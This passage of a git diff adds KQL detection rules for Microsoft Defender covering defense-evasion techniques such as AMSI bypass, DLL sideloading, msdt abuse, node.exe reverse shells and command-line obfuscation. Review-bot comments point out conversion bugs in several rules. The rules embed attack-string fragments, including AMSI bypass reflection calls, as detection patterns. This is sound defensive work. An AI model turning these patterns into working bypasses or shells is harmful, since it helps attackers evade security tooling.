+| where ProcessCommandLine contains "if(0){{{0}}}' -f $(0 -as [char]) +" or ProcessCommandLine contains "#"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql b/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql
new file mode 100644
index 00000000..6defa1db
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql
@@ -0,0 +1,12 @@
+// Title: Potential AMSI Bypass Via .NET Reflection
+// Author: Markus Neis, @Kostastsale
+// Date: 2018-08-17
+// Level: high
+// Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "System.Management.Automation.AmsiUtils" and ProcessCommandLine contains "amsiInitFailed") or (ProcessCommandLine contains "[Ref].Assembly.GetType" and ProcessCommandLine contains "SetValue($null,$true)" and ProcessCommandLine contains "NonPublic,Static")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql b/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql
new file mode 100644
index 00000000..ce646212
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql
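Review bot: The second clause of the NULL Bits rule, `or ProcessCommandLine contains "#"`, matches any command line that contains a `#` character, so this "medium" rule will fire on essentially every PowerShell invocation with a comment in it. Given the rule's title, the source pattern presumably consisted of `#` followed by non-printable null bytes that were stripped during conversion, leaving only the visible prefix. The converter should either preserve such bytes with an escape sequence the KQL string literal supports, or detect that a pattern collapsed to a single printable character and refuse to emit it; as a stop-gap the clause can be dropped with `// NOTE: original null-byte pattern not representable after conversion — clause omitted`.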
@@ -0,0 +1,10 @@
+// Title: Potential AMSI COM Server Hijacking
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-04
+// Level: high
+// Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)" and (not(RegistryValueData =~ "%windir%\\system32\\amsi.dll"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql
new file mode 100644
index 00000000..547d4adf
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql
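Review bot: `RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)"` carries the Sysmon TargetObject convention of appending the value name to the key path; in DeviceRegistryEvents the key path and the value name are separate columns (RegistryKey and RegistryValueName), so a predicate that expects `\(Default)` at the end of RegistryKey can never match and the rule is dead on arrival. The same mapping problem affects the Attachment Manager rules on L1938 and L1939 (`endswith "\\DefaultFileTypeRisk"`, `"\\HideZoneInfoOnProperties"`, …) and the AutoLogger rule on L1940 (`endswith "\\Enable"`, `"\\Start"`), and those three additionally compare `RegistryValueData =~ "DWORD (0x00006152)"` style strings, which is Sysmon's Details formatting rather than how MDE reports DWORD data — verify against the table, but I believe MDE exposes the numeric value and a separate RegistryValueType. The conversion backend should split the trailing path component into a RegistryValueName predicate and translate DWORD details into the table's representation, e.g. for this rule `RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32" and RegistryValueName == "" ` (confirm how the default value's name is surfaced).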
@@ -0,0 +1,14 @@
+// Title: Potential Antivirus Software DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: medium
+// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.
+// - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file.
+// - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\log.dll" and (not(((FolderPath in~ ("C:\\Program Files\\AVAST Software\\Avast\\log.dll", "C:\\Program Files (x86)\\AVAST Software\\Avast\\log.dll")) or (FolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\log.dll", "C:\\Program Files (x86)\\AVG\\Antivirus\\log.dll")) or (FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath
startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not(((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\") or (FolderPath startswith "C:\\Program Files\\AVG\\Antivirus\\" or FolderPath startswith "C:\\Program Files (x86)\\AVG\\Antivirus\\"))))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql b/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql
new file mode 100644
index 00000000..92cd9f87
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql
@@ -0,0 +1,14 @@
+// Title: Potential Application Whitelisting Bypass via Dnx.EXE
+// Author: Beyu Denis, oscd.community
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.
+Attackers might abuse this in order to bypass application whitelisting.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.t1027.004
+// False Positives:
+// - Legitimate use of dnx.exe by legitimate user
+
+DeviceProcessEvents
+| where FolderPath endswith "\\dnx.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql b/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql
new file mode 100644
index 00000000..e8a90e17
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Arbitrary Code Execution Via Node.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --eval ") and FolderPath endswith "\\node.exe") and (ProcessCommandLine contains ".exec(" and ProcessCommandLine contains "net.socket" and ProcessCommandLine contains ".connect" and ProcessCommandLine contains "child_process")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql b/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql
new file mode 100644
index 00000000..b3971eb4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Arbitrary Command Execution Using Msdt.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-29
+// Level: high
+// Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (ProcessCommandLine contains "IT_BrowseForFile=" or (ProcessCommandLine contains " PCWDiagnostic" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af " or ProcessCommandLine contains " –af " or ProcessCommandLine contains " —af " or ProcessCommandLine contains " ―af ")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql b/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql
new file mode 100644
index 00000000..3839334e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql
@@ -0,0 +1,10 @@
+// Title: Potential Arbitrary DLL Load Using Winword
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/l " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\WINWORD.exe" or ProcessVersionInfoOriginalFileName =~ "WinWord.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql b/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql
new file mode 100644
index 00000000..391e2400
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql
@@ -0,0 +1,10 @@
+// Title: Potential Arbitrary File Download Using Office Application
+// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
+// Date: 2022-05-17
+// Level: high
+// Description: Detects potential arbitrary file download using a Microsoft Office application
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and ((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql
new file mode 100644
index 00000000..8c9a2ba9
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql
@@ -0,0 +1,12 @@
+// Title: Potential Attachment Manager Settings Associations Tamper
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations*" and ((RegistryValueData =~ "DWORD (0x00006152)" and RegistryKey endswith "\\DefaultFileTypeRisk") or ((RegistryValueData contains ".zip;" or RegistryValueData contains ".rar;" or RegistryValueData contains ".exe;" or RegistryValueData contains ".bat;" or RegistryValueData contains ".com;" or RegistryValueData contains ".cmd;" or RegistryValueData contains ".reg;" or RegistryValueData contains ".msi;" or RegistryValueData contains ".htm;" or RegistryValueData contains ".html;") and RegistryKey endswith "\\LowRiskFileTypes"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql
new file mode 100644
index 00000000..cfa6d3e8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql
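Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations*"` treats the Sigma wildcard as a literal: `endswith` has no glob semantics in KQL, so the predicate requires the key to end in an actual `*` character and can never be satisfied, which makes the whole rule a no-op. The converter should turn a trailing-wildcard `endswith` into a `contains` (or `has_cs`/regex) predicate, e.g. `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations"`. The same literal `*` is emitted in the Attachments rule on L1939 (`Attachments*`) and twice in the AutoLogger rule on L1940 (`Autologger*`, `DefenderApiLogger*`, `DefenderAuditLogger*`), where it is also AND-ed with `endswith "\\Enable"` / `"\\Start"`, a combination that is contradictory by construction.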
@@ -0,0 +1,12 @@
+// Title: Potential Attachment Manager Settings Attachments Tamper
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects tampering with attachment manager settings policies attachments (See reference for more information)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments*" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\HideZoneInfoOnProperties") or (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SaveZoneInformation") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\ScanWithAntiVirus"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql b/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql
new file mode 100644
index 00000000..370a54d4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql
@@ -0,0 +1,10 @@
+// Title: Potential AutoLogger Sessions Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\System\\CurrentControlSet\\Control\\WMI\\Autologger*" and (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\EventLog-" or RegistryKey contains "\\Defender") and (RegistryKey endswith "\\Enable" or RegistryKey endswith "\\Start"))) and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\") and (RegistryKey endswith "\\DefenderApiLogger*" or RegistryKey endswith "\\DefenderAuditLogger*")) or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql b/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql
new file mode 100644
index 00000000..a4d4f029
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql
@@ -0,0 +1,11 @@
+// Title: Potential Base64 Decoded From Images
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-20
+// Level: high
+// Description: Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "base64" and ProcessCommandLine contains "-d" and ProcessCommandLine contains ">") and (ProcessCommandLine contains ".avif" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jfif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".pjp" or ProcessCommandLine contains ".pjpeg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".svg" or ProcessCommandLine contains ".webp") and FolderPath endswith "/bash" and (ProcessCommandLine contains "tail" and ProcessCommandLine contains "-c")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql b/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql
new file mode 100644
index 00000000..9357a925
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Binary Proxy Execution Via VSDiagnostics.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage for tracing and diagnostics purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /launch:" or ProcessCommandLine contains " -launch:") and ProcessCommandLine contains "start" and (FolderPath endswith "\\VSDiagnostics.exe" or ProcessVersionInfoOriginalFileName =~ "VSDiagnostics.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql
new file mode 100644
index 00000000..e87c0fb8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential CCleanerDU.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-13
+// Level: medium
+// Description: Detects potential DLL sideloading of "CCleanerDU.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives could occur from other custom installation paths. Apply additional filters accordingly.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql
new file mode 100644
index 00000000..c64e73bf
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential CCleanerReactivator.DLL Sideloading
+// Author: X__Junior
+// Date: 2023-07-13
+// Level: medium
+// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives could occur from other custom installation paths. Apply additional filters accordingly.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql
new file mode 100644
index 00000000..6b0ed7b2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential Chrome Frame Helper DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: medium
+// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql b/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql
new file mode 100644
index 00000000..46ae6352
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql
@@ -0,0 +1,13 @@
+// Title: Potential Command Line Path Traversal Evasion Attempt
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-10-26
+// Level: medium
+// Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+// False Positives:
+// - Google Drive
+// - Citrix
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "\\..\\Windows\\" or ProcessCommandLine contains "\\..\\System32\\" or ProcessCommandLine contains "\\..\\..\\") and FolderPath contains "\\Windows\\") or ProcessCommandLine contains ".exe\\..\\") and (not((ProcessCommandLine contains "\\Citrix\\Virtual Smart Card\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\..\\" or ProcessCommandLine contains "\\Google\\Drive\\googledrivesync.exe\\..\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql
new file mode 100644
index 00000000..c7bff6f6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql
@@ -0,0 +1,10 @@
+// Title: Potential Commandline Obfuscation Using Escape Characters
+// Author: juju4
+// Date: 2018-12-11
+// Level: medium
+// Description: Detects potential commandline obfuscation using known escape characters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "h^t^t^p" or ProcessCommandLine contains "h\"t\"t\"p"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql
new file mode 100644
index 00000000..9bf81b2b
--- /dev/null +++ b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql @@ -0,0 +1,12 @@ +// Title: Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image +// Author: frack113, Florian Roth (Nextron Systems), Josh Nickels +// Date: 2024-09-02 +// Level: high +// Description: Detects potential commandline obfuscation using unicode characters. +Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and (ProcessVersionInfoOriginalFileName in~ ("Cmd.EXE", "cscript.exe", "PowerShell.EXE", "PowerShell_ISE.EXE", "pwsh.dll", "wscript.exe"))) and (ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ" or ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄" or ProcessCommandLine contains "―" or ProcessCommandLine contains "—" or ProcessCommandLine contains " " or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "¶" or ProcessCommandLine contains "⠀") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql b/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql new file mode 100644 index 00000000..e7be3eef --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql 
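Review bot: In the Unicode obfuscation rule the clause `ProcessCommandLine contains " "` renders as an ordinary space; the source pattern almost certainly carried a non-ASCII whitespace character (a non-breaking or figure space), and if it was normalised to U+0020 somewhere in the conversion or save path this one clause matches every command line that has a space in it, which makes the remaining eleven lookalike-character clauses irrelevant. Check the actual byte in the emitted file and, if it is a plain space, write the intended code point with an escape sequence the string literal supports rather than the raw glyph, so later editing or normalisation cannot silently widen the rule again; a comment such as `// NOTE: the whitespace clause below must be a non-ASCII space, not U+0020` would help the next reader. The other non-ASCII literals on this line (the modifier letters, fraction slash, dashes, `¯`, `®`, `¶`, braille blank) look intact.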
@@ -0,0 +1,10 @@
+// Title: Potential Data Stealing Via Chromium Headless Debugging
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-23
+// Level: high
+// Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.collection, attack.t1185, attack.t1564.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--remote-debugging-" and ProcessCommandLine contains "--user-data-dir" and ProcessCommandLine contains "--headless"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql
new file mode 100644
index 00000000..d840a792
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql
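Review bot: In the chromium-headless rule the `// MITRE Tactic: Defense Evasion` line names one tactic while `// Tags:` carries `attack.defense-evasion, attack.credential-access, attack.collection`, so the generated header disagrees with itself; either emit every tactic, `// MITRE Tactic: Defense Evasion, Credential Access, Collection`, or rename the line to make clear it is the primary tactic only. The query keys on three command-line flags with no FolderPath restriction, so a non-browser process that merely passes these strings as arguments (a launcher or a test script) matches too; that appears to mirror the source rule, but a `// False Positives:` note saying so would help analysts triage hits.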
@@ -0,0 +1,10 @@
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "😀" or ProcessCommandLine contains "😃" or ProcessCommandLine contains "😄" or ProcessCommandLine contains "😁" or ProcessCommandLine contains "😆" or ProcessCommandLine contains "😅" or ProcessCommandLine contains "😂" or ProcessCommandLine contains "🤣" or ProcessCommandLine contains "🥲" or ProcessCommandLine contains "🥹" or ProcessCommandLine contains "☺️" or ProcessCommandLine contains "😊" or ProcessCommandLine contains "😇" or ProcessCommandLine contains "🙂" or ProcessCommandLine contains "🙃" or ProcessCommandLine contains "😉" or ProcessCommandLine contains "😌" or ProcessCommandLine contains "😍" or ProcessCommandLine contains "🥰" or ProcessCommandLine contains "😘" or ProcessCommandLine contains "😗" or ProcessCommandLine contains "😙" or ProcessCommandLine contains "😚" or ProcessCommandLine contains "😋" or ProcessCommandLine contains "😛" or ProcessCommandLine contains "😝" or ProcessCommandLine contains "😜" or ProcessCommandLine contains "🤪" or ProcessCommandLine contains "🤨" or ProcessCommandLine contains "🧐" or ProcessCommandLine contains "🤓" or ProcessCommandLine contains "😎" or ProcessCommandLine contains "🥸" or ProcessCommandLine contains "🤩" or ProcessCommandLine contains "🥳" or ProcessCommandLine contains "😏" or ProcessCommandLine contains "😒" or ProcessCommandLine contains "😞" or ProcessCommandLine contains "😔" or ProcessCommandLine contains "😟" or ProcessCommandLine contains "😕" or ProcessCommandLine contains "🙁" or ProcessCommandLine contains "☹️" or ProcessCommandLine contains "😣" or ProcessCommandLine contains "😖" or 